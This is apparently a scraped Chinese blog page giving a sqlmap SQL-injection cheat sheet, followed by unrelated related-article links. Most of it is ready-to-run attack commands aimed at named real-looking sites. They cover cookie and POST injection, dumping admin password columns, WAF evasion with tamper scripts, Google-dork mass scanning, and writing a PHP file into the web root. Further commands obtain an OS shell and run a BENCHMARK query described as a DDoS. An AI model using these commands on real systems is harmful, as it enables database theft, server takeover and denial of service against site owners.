一共有七个等级
0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面。

Mysql数据库注入
is-dba        当前用户权限
dbs            所有数据库
current-db        网站当前数据库
users            所有数据库用户
current-user    当前数据库用户
passwords         当前用户有权限读取包含用户密码的表的权限时,sqlmap会现列举出用户,然后列出hash,并尝试破解

Cookie注入
1.sqlmap -u "http://www.baidu.com/show.asp" --cookie "id=12" --level 2
2.sqlmap -u "http://www.baidu.com/show.asp" --tables --cookie "id=12" --level 2
3.sqlmap -u "http://www.baidu.com/show.asp" --columns -T "admin" --cookie "id=12" --level 2
4.sqlmap -u "http://www.baidu.com/show.asp" --dump -C "admin,password" -T "admin" --cookie "id=12" --level 2

Post注入
forms              自动获取post包
r            从本地获取结果post包
//注意看清提示键y,n,默认的键为大写
forms用法:
1.sqlmap -u "http://www.acyt.org/submit.php" --forms
2.sqlmap -u "http://www.acyt.org/submit.php" --forms --dbs
3.sqlmap -u "http://www.acyt.org/submit.php" --forms --tables -D "db"
参数r用法:
1.sqlmap -r post.txt
2.sqlmap -r post.txt --dbs
3.sqlmap -r post.txt --tables -D "db"
当请求是HTTPS的时候你需要配合这个--force-ssl参数来使用,或者你可以在Host头后门加上:443

伪静态注入
例:http://www.acty.org/view/id/40.html
sqlmap -u "http://www.acty.org/view/id/40*.html" //注意*的位置

用谷歌批量扫注入
sqlmap -g "site:baidu.com inurl:php?id="

Temper插件过waf
sqlmap -u "http://www.acyt.org/news.php?id=34" --check-waf --tamper="插件" //检测是否有waf,会显示
1.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --batch --tamper="插件" //等级3以上才能检测
2.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --dbs --batch --tamper="插件"
3.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --tables -D "db" --batch --tamper="插件"
batch         要求不对目标写入   //可以不加,最好加
tamper        使用干预脚本
check        检查URL

File参数写文件
条件:
1.权限为dba权限
2.magic_quotes_gpc设置为off

file-write              从本地写入
file-dest            写入目标路径

语句:
sqlmap -u "http://www.acyt.org/news.php?id=34" --file-write=D:/1.php --file-dest=C:/input/www/test.php   //file-write是本机的文件,file-dest为网站绝对路径,注意斜杠

os参数
前提是要有dba权限,有dba权限不一定能使用
cmd            执行cmd命令(win)
shell            执行当前用户命令
sqlmap -u "http://www.acyt.org/news.php?id=34" --os-cmd="whoami"
sqlmap -u "http://www.acyt.org/news.php?id=34" --os-shell="whoami"
sqlmapDDoS攻击
sqlmap -u "http://www.acyt.org/news.php?id=34" --sql-shell
获得一个即时shell,执行
select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

注入延时
sqlmap -u "http://www.acyt.org/news.php?id=34" --delay 0.5 //延时0.5秒
sqlmap -u "http://www.acyt.org/news.php?id=34" --dbs --delay 0.5
从Burp或者WebScarab代理中获取日志
sqlmap -l burp.log
sqlmap -l burp.log --dbs

执行sql语句
参数:--sql-query,--sql-shell
sqlmap -u "http://www.acyt.org/news.php?id=34" --sql-shell "sql语句"

暴力破解列名或表明
参数:--coomon-tables , --common-columns
sqlmap -u "http://www.acyt.org/news.php?id=34" --common-tables -D "db"
字典在txt文件夹下,可自定义

Sqlmap用法小结的更多相关文章

  1. 转载:Hadoop排序工具用法小结

    本文转载自Silhouette的文章,原文地址:http://www.dreamingfish123.info/?p=1102 Hadoop排序工具用法小结 发表于 2014 年 8 月 25 日 由 ...

  2. [No000010]Ruby 中一些百分号(%)的用法小结

    #Ruby 中一些百分号(%)的用法小结 #这篇文章主要介绍了Ruby 中一些百分号(%)的用法小结,需要的朋友可以参考下 what_frank_said = "Hello!"#% ...

  3. C++ typedef用法小结 (※不能不看※)

    C++ typedef用法小结 (※不能不看※) 第一.四个用途 用途一: 定义一种类型的别名,而不只是简单的宏替换.可以用作同时声明指针型的多个对象.比如:char* pa, pb; // 这多数不 ...

  4. 函数fgets和fputs、fread和fwrite、fscanf和fprintf用法小结 (转)

    函数fgets和fputs.fread和fwrite.fscanf和fprintf用法小结 字符串读写函数fgets和fputs 一.读字符串函数fgets函数的功能是从指定的文件中读一个字符串到字符 ...

  5. 1:CSS中一些@规则的用法小结 2: @media用法详解

    第一篇文章:@用法小结 第二篇文章:@media用法 第一篇文章:@用法小结 这篇文章主要介绍了CSS中一些@规则的用法小结,是CSS入门学习中的基础知识,需要的朋友可以参考下     at-rule ...

  6. 英语语法最终珍藏版笔记- 21it 用法小结

    it 用法小结 it 在英语中的意思较多,用法较广,现总结如下. 一.it作句子的真正主语 1.it 指前面已经提到过的人或事物,有时指心目中的或成为问题的人或事物,作真正主语. 例如: What’s ...

  7. [转]ssh常用用法小结

    ssh常用用法小结 1.连接到远程主机: 命令格式 : ssh name@remoteserver 或者 ssh remoteserver -l name 说明:以上两种方式都可以远程登录到远程主机, ...

  8. 结构体定义 typedef struct 用法详解和用法小结

    typedef是类型定义的意思.typedef struct 是为了使用这个结构体方便.具体区别在于:若struct node {}这样来定义结构体的话.在申请node 的变量时,需要这样写,stru ...

  9. typedef用法小结

    typedef用法小结- - 注意:本文转自网络,版权归原作者所有. typedef typedef用法小结- - 这两天在看程序的时候,发现很多地方都用到typedef,在结构体定义,还有一些数组等 ...

随机推荐

  1. Java多线程编程实战指南(核心篇)读书笔记(一)

    (尊重劳动成果,转载请注明出处:http://blog.csdn.net/qq_25827845/article/details/76422930冷血之心的博客) 博主准备恶补一番Java高并发编程相 ...

  2. linux给一个文件夹开启权限

    假如要给一个叫做xiaobang的文件夹权限,CD到这一级目录 chmod -R 777 xiaobang

  3. C# OPC UA服务器 OPC UA网关 三菱 西门子 欧姆龙 Modbus转OPC UA 服务器 可配置的OPC UA服务器网关 HslSharp软件文档

    前言 本文将使用一个基于开源项目HslCommunication创建的OPC UA网关,方便通过配置创建一个OPC UA的网关中心.具体的操作及支持的设备信息项目参照下面: 开源项目HslCommun ...

  4. 自己总结 C++ 代码规范

    .编写原则,代码尽量简单,简洁,高效,自己写的代码让自己和别人容易看懂 .命名: a. 类的成员变量加前缀 m_(表示 member). 常量全用大写的字母,用下划线分割单词(;) 循环变量和简单变量 ...

  5. IOS开发使用GCD后台运行

    什么是GCD Grand Central Dispatch (GCD)是Apple开发的一个多核编程的解决方法.该方法在Mac OS X 10.6雪豹中首次推出,并随后被引入到了iOS4.0中.GCD ...

  6. 你离BAT之间,只差这一套Java面试题

    最近,各大公司开始了春招,很多人已经开始在准备面试了,特地来总结下初中级程序员应该掌握的面试题目.这篇面试指南,只适用于初中级程序员,其中不涉及分布式等问题.关于中高级的程序员问题,我后面可能再出一篇 ...

  7. JavaScript HTML Handlebars Template

    /********************************************************************* * JavaScript HTML Handlebars  ...

  8. MVC MVVM和传统三层的理解

    才学疏浅,请勿喷,如果有理解不对的地方请留言 其实,每个小小的程序员都有个毛病,就是反复写一个东西会觉得这个东西没有新意. 就像让你写三层,你却还是觉得想写MVC模式. 软件小公司做B/S的大部分还是 ...

  9. HihoCoder 1033交错和(数位DP第三题)

    (写挂了,有空再补) 时间限制:10000ms 单点时限:1000ms 内存限制:256MB 描述 给定一个数 x,设它十进制展从高位到低位上的数位依次是 a0, a1, ..., an - 1,定义 ...

  10. Java并发--同步容器

    为了方便编写出线程安全的程序,Java里面提供了一些线程安全类和并发工具,比如:同步容器.并发容器.阻塞队列.Synchronizer(比如CountDownLatch).今天我们就来讨论下同步容器. ...